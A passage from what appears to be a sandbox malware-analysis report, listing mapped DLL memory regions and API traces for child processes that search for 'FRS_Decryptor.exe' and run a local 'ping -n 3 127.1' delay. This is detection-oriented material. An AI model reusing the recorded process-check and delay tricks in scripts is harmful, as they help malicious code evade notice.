= "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4081 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 4082 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4083 start_va = 0x75360000 end_va = 0x75456fff entry_point = 0x75360000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 4084 start_va = 0x75460000 end_va = 0x755aefff entry_point = 0x75460000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4085 start_va = 0x75700000 end_va = 0x7577cfff entry_point = 0x75700000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 4086 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4087 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4088 start_va = 0x76c50000 end_va = 0x76d5bfff entry_point = 0x76c50000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 4089 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 4090 start_va = 0x76d70000 end_va = 0x76db0fff entry_point = 0x76d70000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 4091 start_va = 0x76dc0000 end_va = 0x76de4fff entry_point = 0x76dc0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4092 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4093 start_va = 0x76ec0000 end_va = 0x76fc7fff entry_point = 0x76ec0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4094 start_va = 0x7fc50000 end_va = 0x7fd4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007fc50000" filename = "" Region: id = 4095 start_va = 0x7fd76000 end_va = 0x7fd78fff entry_point = 0x0 region_type = private name = "private_0x000000007fd76000" filename = "" Thread: id = 227 os_tid = 0x454 Thread: id = 229 os_tid = 0x3ec Thread: id = 230 os_tid = 0x518 Thread: id = 231 os_tid = 0x3c8 Process: id = "76" image_name = "find.exe" filename = "c:\\windows\\syswow64\\find.exe" page_root = "0x1677b000" os_pid = "0x308" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "74" os_parent_pid = "0x8c8" cmd_line = "find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4012 start_va = 0x6b0000 end_va = 0x6cffff entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 4013 start_va = 0x6d0000 end_va = 0x6d1fff entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 4014 start_va = 0x6e0000 end_va = 0x6eefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006e0000" filename = "" Region: id = 4015 start_va = 0x6f0000 end_va = 0x72ffff entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 4016 start_va = 0x730000 end_va = 0x76ffff entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 4017 start_va = 0x770000 end_va = 0x773fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000770000" filename = "" Region: id = 4018 start_va = 0x780000 end_va = 0x780fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000780000" filename = "" Region: id = 4019 start_va = 0x790000 end_va = 0x791fff entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 4020 start_va = 0x11c0000 end_va = 0x11c6fff entry_point = 0x11c0000 region_type = mapped_file name = "find.exe" filename = "\\Windows\\SysWOW64\\find.exe" (normalized: "c:\\windows\\syswow64\\find.exe") Region: id = 4021 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4022 start_va = 0x7f920000 end_va = 0x7f942fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f920000" filename = "" Region: id = 4023 start_va = 0x7f949000 end_va = 0x7f949fff entry_point = 0x0 region_type = private name = "private_0x000000007f949000" filename = "" Region: id = 4024 start_va = 0x7f94b000 end_va = 0x7f94bfff entry_point = 0x0 region_type = private name = "private_0x000000007f94b000" filename = "" Region: id = 4025 start_va = 0x7f94d000 end_va = 0x7f94ffff entry_point = 0x0 region_type = private name = "private_0x000000007f94d000" filename = "" Region: id = 4026 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4027 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4028 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4029 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 4034 start_va = 0x830000 end_va = 0x83ffff entry_point = 0x0 region_type = private name = "private_0x0000000000830000" filename = "" Region: id = 4035 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4036 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4037 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Thread: id = 228 os_tid = 0x3d8 Process: id = "77" image_name = "ping.exe" filename = "c:\\windows\\syswow64\\ping.exe" page_root = "0x22608000" os_pid = "0x5e8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "ping -n 3 127.1" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4096 start_va = 0x940000 end_va = 0x948fff entry_point = 0x940000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\SysWOW64\\PING.EXE" (normalized: "c:\\windows\\syswow64\\ping.exe") Region: id = 4097 start_va = 0x990000 end_va = 0x9affff entry_point = 0x0 region_type = private name = "private_0x0000000000990000" filename = "" Region: id = 4098 start_va = 0x9b0000 end_va = 0x9b1fff entry_point = 0x0 region_type = private name = "private_0x00000000009b0000" filename = "" Region: id = 4099 start_va = 0x9c0000 end_va = 0x9cefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009c0000" filename = "" Region: id = 4100 start_va = 0x9d0000 end_va = 0xa0ffff entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 4101 start_va = 0xa10000 end_va = 0xa4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 4102 start_va = 0xa50000 end_va = 0xa53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a50000" filename = "" Region: id = 4103 start_va = 0xa60000 end_va = 0xa60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a60000" filename = "" Region: id = 4104 start_va = 0xa70000 end_va = 0xa71fff entry_point = 0x0 region_type = private name = "private_0x0000000000a70000" filename = "" Region: id = 4105 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4106 start_va = 0x7eef0000 end_va = 0x7ef12fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007eef0000" filename = "" Region: id = 4107 start_va = 0x7ef19000 end_va = 0x7ef1bfff entry_point = 0x0 region_type = private name = "private_0x000000007ef19000" filename = "" Region: id = 4108 start_va = 0x7ef1c000 end_va = 0x7ef1cfff entry_point = 0x0 region_type = private name = "private_0x000000007ef1c000" filename = "" Region: id = 4109 start_va = 0x7ef1f000 end_va = 0x7ef1ffff entry_point = 0x0 region_type = private name = "private_0x000000007ef1f000" filename = "" Region: id = 4110 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4111 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4112 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4113 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 4114 start_va = 0xc60000 end_va = 0xc6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c60000" filename = "" Region: id = 4115 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4116 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4117 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4118 start_va = 0x990000 end_va = 0x99ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000990000" filename = "" Region: id = 4119 start_va = 0x9a0000 end_va = 0x9a3fff entry_point = 0x0 region_type = private name = "private_0x00000000009a0000" filename = "" Region: id = 4120 start_va = 0xad0000 end_va = 0xbcffff entry_point = 0x0 region_type = private name = "private_0x0000000000ad0000" filename = "" Region: id = 4121 start_va = 0xbd0000 end_va = 0xc4dfff entry_point = 0xbd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4122 start_va = 0xcc0000 end_va = 0xccffff entry_point = 0x0 region_type = private name = "private_0x0000000000cc0000" filename = "" Region: id = 4123 start_va = 0x73db0000 end_va = 0x73db7fff entry_point = 0x73db0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 4124 start_va = 0x73dc0000 end_va = 0x73dddfff entry_point = 0x73dc0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 4125 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4126 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4127 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4128 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4129 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 4130 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4131 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4132 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4133 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 4134 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4135 start_va = 0x7edf0000 end_va = 0x7eeeffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007edf0000" filename = "" Region: id = 4136 start_va = 0xa80000 end_va = 0xabffff entry_point = 0x0 region_type = private name = "private_0x0000000000a80000" filename = "" Region: id = 4137 start_va = 0xc70000 end_va = 0xcaffff entry_point = 0x0 region_type = private name = "private_0x0000000000c70000" filename = "" Region: id = 4138 start_va = 0x7ef16000 end_va = 0x7ef18fff entry_point = 0x0 region_type = private name = "private_0x000000007ef16000" filename = "" Region: id = 4139 start_va = 0x73690000 end_va = 0x736d4fff entry_point = 0x73690000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 4140 start_va = 0x9b0000 end_va = 0x9b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009b0000" filename = "" Region: id = 4141 start_va = 0xac0000 end_va = 0xac0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ac0000" filename = "" Region: id = 4142 start_va = 0xc50000 end_va = 0xc52fff entry_point = 0xc50000 region_type = mapped_file name = "ping.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\ping.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\ping.exe.mui") Region: id = 4143 start_va = 0xcd0000 end_va = 0xd0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 4144 start_va = 0xd10000 end_va = 0xd4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d10000" filename = "" Region: id = 4145 start_va = 0x7ef13000 end_va = 0x7ef15fff entry_point = 0x0 region_type = private name = "private_0x000000007ef13000" filename = "" Thread: id = 232 os_tid = 0x988 [0088.974] GetModuleHandleA (lpModuleName=0x0) returned 0x940000 [0088.974] __set_app_type (_Type=0x1) [0088.974] __p__fmode () returned 0x76ea1768 [0088.974] __p__commode () returned 0x76ea176c [0088.974] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x943229) returned 0x0 [0088.974] __wgetmainargs (in: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0, _DoWildCard=0, _StartInfo=0x9440dc | out: _Argc=0x9440c8, _Argv=0x9440cc, _Env=0x9440d0) returned 0 [0088.974] SetThreadUILanguage (LangId=0x0) returned 0x409 [0088.976] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0088.976] _fileno (_File=0x76ea4c28) returned 1 [0088.976] _get_osfhandle (_FileHandle=1) returned 0x28 [0088.976] GetFileType (hFile=0x28) returned 0x2 [0088.976] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xa4f3c0 | out: lpMode=0xa4f3c0) returned 0 [0088.976] GetLastError () returned 0x6 [0088.976] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xa4f324, nSize=0x50 | out: lpBuffer="䤐­") returned 0x0 [0088.976] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x945500 | out: lpWSAData=0x945500) returned 0 [0088.978] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0xa4f3dc | out: phkResult=0xa4f3dc*=0x88) returned 0x0 [0088.978] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0xa4f3d0, lpData=0xa4f3d8, lpcbData=0xa4f3d4*=0x4 | out: lpType=0xa4f3d0*=0x0, lpData=0xa4f3d8*=0x0, lpcbData=0xa4f3d4*=0x4) returned 0x2 [0088.978] RegCloseKey (hKey=0x88) returned 0x0 [0088.978] GetAddrInfoW (in: pNodeName="127.1", pServiceName=0x0, pHints=0xa4f3a0*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xa4f3dc | out: ppResult=0xa4f3dc*=0xadc408*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xad89e8*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) returned 0 [0088.978] FreeAddrInfoW (pAddrInfo=0xadc408*(ai_flags=4, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0xad89e8*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0)) [0088.978] IcmpCreateFile () returned 0xad6c60 [0088.981] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0xadc4a8 [0088.981] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0xae5270 [0088.981] GetNameInfoW (in: pSockaddr=0x945480*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), SockaddrLength=0x10, pNodeBuffer=0xa4f4d8, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="127.0.0.1", pServiceBuffer=0x0) returned 0 [0088.982] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274b, dwLanguageId=0x0, lpBuffer=0xa4f3d0, nSize=0x0, Arguments=0xa4f3cc | out: lpBuffer="竈®ﶤ¤┗\x94䰨盪❋") returned 0x14 [0088.983] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0088.983] _fileno (_File=0x76ea4c28) returned 1 [0088.983] _get_osfhandle (_FileHandle=1) returned 0x28 [0088.983] GetFileType (hFile=0x28) returned 0x2 [0088.983] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xa4f394 | out: lpMode=0xa4f394) returned 0 [0088.983] GetLastError () returned 0x6 [0088.983] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xa4f2f8, nSize=0x50 | out: lpBuffer="¤❋") returned 0x0 [0088.983] _fileno (_File=0x76ea4c28) returned 1 [0088.983] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0088.983] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0088.983] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0xae7b00 [0088.983] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\nPinging 127.0.0.1 ", cchWideChar=-1, lpMultiByteStr=0xae7b00, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nPinging 127.0.0.1 ", lpUsedDefaultChar=0x0) returned 21 [0088.983] _fileno (_File=0x76ea4c28) returned 1 [0088.983] _write (in: _FileHandle=1, _Buf=0xae7b00*, _MaxCharCount=0x14 | out: _Buf=0xae7b00*) returned 20 [0088.983] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0088.983] _fileno (_File=0x76ea4c28) returned 1 [0088.983] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0088.983] LocalFree (hMem=0xae7b00) returned 0x0 [0088.983] LocalFree (hMem=0xae7ac8) returned 0x0 [0088.983] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0xa4f3d0, nSize=0x0, Arguments=0xa4f3cc | out: lpBuffer="竈®ﶤ¤▪\x94䰨盪❚") returned 0x18 [0088.983] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0088.983] _fileno (_File=0x76ea4c28) returned 1 [0088.983] _get_osfhandle (_FileHandle=1) returned 0x28 [0088.983] GetFileType (hFile=0x28) returned 0x2 [0088.983] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xa4f394 | out: lpMode=0xa4f394) returned 0 [0088.983] GetLastError () returned 0x6 [0088.983] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xa4f2f8, nSize=0x50 | out: lpBuffer="¤❚") returned 0x0 [0088.983] _fileno (_File=0x76ea4c28) returned 1 [0088.983] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0088.983] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0088.983] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0xadc430 [0088.983] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="with 32 bytes of data:\r\n", cchWideChar=-1, lpMultiByteStr=0xadc430, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="with 32 bytes of data:\r\n", lpUsedDefaultChar=0x0) returned 25 [0088.983] _fileno (_File=0x76ea4c28) returned 1 [0088.983] _write (in: _FileHandle=1, _Buf=0xadc430*, _MaxCharCount=0x18 | out: _Buf=0xadc430*) returned 24 [0088.983] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0088.983] _fileno (_File=0x76ea4c28) returned 1 [0088.983] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0088.983] LocalFree (hMem=0xadc430) returned 0x0 [0088.983] LocalFree (hMem=0xae7ac8) returned 0x0 [0088.983] SetConsoleCtrlHandler (HandlerRoutine=0x941a3d, Add=1) returned 1 [0088.984] IcmpSendEcho2Ex (in: IcmpHandle=0xad6c60, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x0, DestinationAddress=0x100007f, RequestData=0xadc4a8, RequestSize=0x20, RequestOptions=0xa4f44c, ReplyBuffer=0xae5270, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0xae5270) returned 0x1 [0088.984] InetNtopW (in: Family=2, pAddr=0xa4f43c, pStringBuf=0xa4f564, StringBufSize=0x16 | out: pStringBuf="127.0.0.1") returned="127.0.0.1" [0088.984] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0xa4f3d0, nSize=0x0, Arguments=0xa4f3cc | out: lpBuffer="笈®ﶤ¤⛔\x94䰨盪✣") returned 0x16 [0088.984] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0088.984] _fileno (_File=0x76ea4c28) returned 1 [0088.985] _get_osfhandle (_FileHandle=1) returned 0x28 [0088.985] GetFileType (hFile=0x28) returned 0x2 [0088.985] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0xa4f394 | out: lpMode=0xa4f394) returned 0 [0088.985] GetLastError () returned 0x6 [0088.985] GetEnvironmentVariableW (in: lpName="OutputEncoding", lpBuffer=0xa4f2f8, nSize=0x50 | out: lpBuffer="¤✣") returned 0x0 [0088.985] _fileno (_File=0x76ea4c28) returned 1 [0088.985] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0088.985] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0088.985] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0xae7b40 [0088.985] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Reply from 127.0.0.1: ", cchWideChar=-1, lpMultiByteStr=0xae7b40, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reply from 127.0.0.1: ", lpUsedDefaultChar=0x0) returned 23 [0088.985] _fileno (_File=0x76ea4c28) returned 1 [0088.985] _write (in: _FileHandle=1, _Buf=0xae7b40*, _MaxCharCount=0x16 | out: _Buf=0xae7b40*) returned 22 [0088.985] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0088.985] _fileno (_File=0x76ea4c28) returned 1 [0088.985] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0088.985] LocalFree (hMem=0xae7b40) returned 0x0 [0088.985] LocalFree (hMem=0xae7b08) returned 0x0 [0088.985] FormatMessageW (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273c, dwLanguageId=0x0, lpBuffer=0xa4f3d0, nSize=0x0, Arguments=0xa4f3cc | out: lpBuffer="笈®ﶤ¤⛿\x94䰨盪✼") returned 0x9 [0088.985] fflush (in: _File=0x76ea4c28 | out: _File=0x76ea4c28) returned 0 [0088.985] _fileno (_File=0x76ea4c28) returned 1 [0088.985] _get_osfhandle 